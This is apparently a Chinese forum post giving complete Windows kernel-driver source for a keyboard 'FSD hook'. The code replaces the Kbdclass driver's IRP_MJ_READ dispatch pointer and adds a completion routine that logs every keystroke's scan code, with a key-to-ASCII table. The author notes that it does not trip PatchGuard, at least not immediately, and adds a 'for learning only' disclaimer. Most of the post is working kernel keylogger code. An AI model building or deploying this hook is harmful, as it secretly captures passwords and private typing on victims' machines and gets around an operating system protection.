KEYBOARD FSD HOOK
说明:技术仅供学习使用,如恶意利用,与作者无关!
技术简介
上一篇文章我们讲了NTFS FSD HOOK其实,它不只这些功能,他可以拦截键盘输入,拦截Create请求等等....
其代码也十分模板化,只需要ObReferenceObjectByName然后对你需要HOOK的地方执行转换,变成我们的实现就可以了!
据我测试,不会触发PG(至少不会立刻)
我们驱动的分发函数是这样写的:
DriverObject->MajorFunction[IRP_MJ_CREATE] = (PDRIVER_DISPATCH)NtfsFsdCreate;
我们只要改了MajorFunction[IRP_MJ_CREATE],改成我们的,我们就能拦截IRP_MJ_CREATE请求!
Tips:这里我说一下,FSD HOOK不仅仅是文件系统HOOK,只要是MajorFunction都可以HOOK!
源码
Main.cpp
#include <ntifs.h>
#include <ntddkbd.h>
#include <ntdef.h>
#include <windef.h>
EXTERN_C_START
NTSYSAPI NTSTATUS NTAPI ObReferenceObjectByName(
__in PUNICODE_STRING ObjectName,
__in ULONG Attributes,
__in_opt PACCESS_STATE AccessState,
__in_opt ACCESS_MASK DesiredAccess,
__in POBJECT_TYPE ObjectType,
__in KPROCESSOR_MODE AccessMode,
__inout_opt PVOID ParseContext,
__out PVOID* Object
);
extern POBJECT_TYPE* IoDriverObjectType;
EXTERN_C_END
typedef NTSTATUS(*IRP_MJ_SERIES)
(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp
);
IRP_MJ_SERIES KbdRead = NULL;
PDRIVER_OBJECT KbdDrvObj;
static int KbdStatus = 4;
CONST BYTE AsciiTable[] = {
0x00, 0x1B, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x2D, 0x3D, 0x08, 0x09, //normal
0x71, 0x77, 0x65, 0x72, 0x74, 0x79, 0x75, 0x69, 0x6F, 0x70, 0x5B, 0x5D, 0x0D, 0x00, 0x61, 0x73,
0x64, 0x66, 0x67, 0x68, 0x6A, 0x6B, 0x6C, 0x3B, 0x27, 0x60, 0x00, 0x5C, 0x7A, 0x78, 0x63, 0x76,
0x62, 0x6E, 0x6D, 0x2C, 0x2E, 0x2F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,
0x32, 0x33, 0x30, 0x2E,
0x00, 0x1B, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x2D, 0x3D, 0x08, 0x09, //caps
0x51, 0x57, 0x45, 0x52, 0x54, 0x59, 0x55, 0x49, 0x4F, 0x50, 0x5B, 0x5D, 0x0D, 0x00, 0x41, 0x53,
0x44, 0x46, 0x47, 0x48, 0x4A, 0x4B, 0x4C, 0x3B, 0x27, 0x60, 0x00, 0x5C, 0x5A, 0x58, 0x43, 0x56,
0x42, 0x4E, 0x4D, 0x2C, 0x2E, 0x2F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,
0x32, 0x33, 0x30, 0x2E,
0x00, 0x1B, 0x21, 0x40, 0x23, 0x24, 0x25, 0x5E, 0x26, 0x2A, 0x28, 0x29, 0x5F, 0x2B, 0x08, 0x09, //shift
0x51, 0x57, 0x45, 0x52, 0x54, 0x59, 0x55, 0x49, 0x4F, 0x50, 0x7B, 0x7D, 0x0D, 0x00, 0x41, 0x53,
0x44, 0x46, 0x47, 0x48, 0x4A, 0x4B, 0x4C, 0x3A, 0x22, 0x7E, 0x00, 0x7C, 0x5A, 0x58, 0x43, 0x56,
0x42, 0x4E, 0x4D, 0x3C, 0x3E, 0x3F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,
0x32, 0x33, 0x30, 0x2E,
0x00, 0x1B, 0x21, 0x40, 0x23, 0x24, 0x25, 0x5E, 0x26, 0x2A, 0x28, 0x29, 0x5F, 0x2B, 0x08, 0x09, //caps + shift
0x71, 0x77, 0x65, 0x72, 0x74, 0x79, 0x75, 0x69, 0x6F, 0x70, 0x7B, 0x7D, 0x0D, 0x00, 0x61, 0x73,
0x64, 0x66, 0x67, 0x68, 0x6A, 0x6B, 0x6C, 0x3A, 0x22, 0x7E, 0x00, 0x7C, 0x7A, 0x78, 0x63, 0x76,
0x62, 0x6E, 0x6D, 0x3C, 0x3E, 0x3F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,
0x32, 0x33, 0x30, 0x2E
};
NTSTATUS Fake_KbdFsdReadCompletion(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp, IN PVOID Context)
{
if (NT_SUCCESS(Irp->IoStatus.Status))
{
LPVOID Buffer = Irp->AssociatedIrp.SystemBuffer;
PKEYBOARD_INPUT_DATA KeyData = (PKEYBOARD_INPUT_DATA)Buffer;
KdPrint(("%sScanCode:%x", KeyData->Flags ? "UP: " : "DOWN: ", KeyData->MakeCode));
}
if (Irp->PendingReturned)
IoMarkIrpPending(Irp);
if ((Irp->StackCount > (ULONG)1) && (Context != NULL))
return ((PIO_COMPLETION_ROUTINE)Context)(DeviceObject, Irp, NULL);
else
return Irp->IoStatus.Status;
}
NTSTATUS Fake_KbdDispatchRead(IN PDEVICE_OBJECT pDeviceObject, IN PIRP pIrp)
{
PIO_STACK_LOCATION irpSp;
irpSp = IoGetCurrentIrpStackLocation(pIrp);
irpSp->Control =
SL_INVOKE_ON_SUCCESS |
SL_INVOKE_ON_ERROR |
SL_INVOKE_ON_CANCEL;
irpSp->Context = irpSp->CompletionRoutine;
irpSp->CompletionRoutine = (PIO_COMPLETION_ROUTINE)Fake_KbdFsdReadCompletion;
return KbdRead(pDeviceObject, pIrp);
}
EXTERN_C NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING pRegistryPath)
{
UNREFERENCED_PARAMETER(pDriverObject);
UNREFERENCED_PARAMETER(pRegistryPath);
NTSTATUS ntStatus = STATUS_SUCCESS;
UNICODE_STRING uniKbdDrvName = RTL_CONSTANT_STRING(L"\\Driver\\Kbdclass");
ntStatus = ObReferenceObjectByName(&uniKbdDrvName, OBJ_CASE_INSENSITIVE, 0, 0, *IoDriverObjectType, KernelMode, 0, (PVOID*)&KbdDrvObj);
if (NT_SUCCESS(ntStatus))
{
volatile PLONG64 HookPoint = NULL;
if (MmIsAddressValid(KbdDrvObj))
KbdRead = (IRP_MJ_SERIES)InterlockedExchange64((PLONG64 volatile)(&KbdDrvObj->MajorFunction[IRP_MJ_READ]), (ULONG64)Fake_KbdDispatchRead);
}
else
KdPrint(("KBD FSD HOOK Fail... Errorcode:%08X\n", ntStatus));
return ntStatus;
}
[复制链接]
发表于 2020-4-7 10:05
|
发表于 2020-11-29 17:55
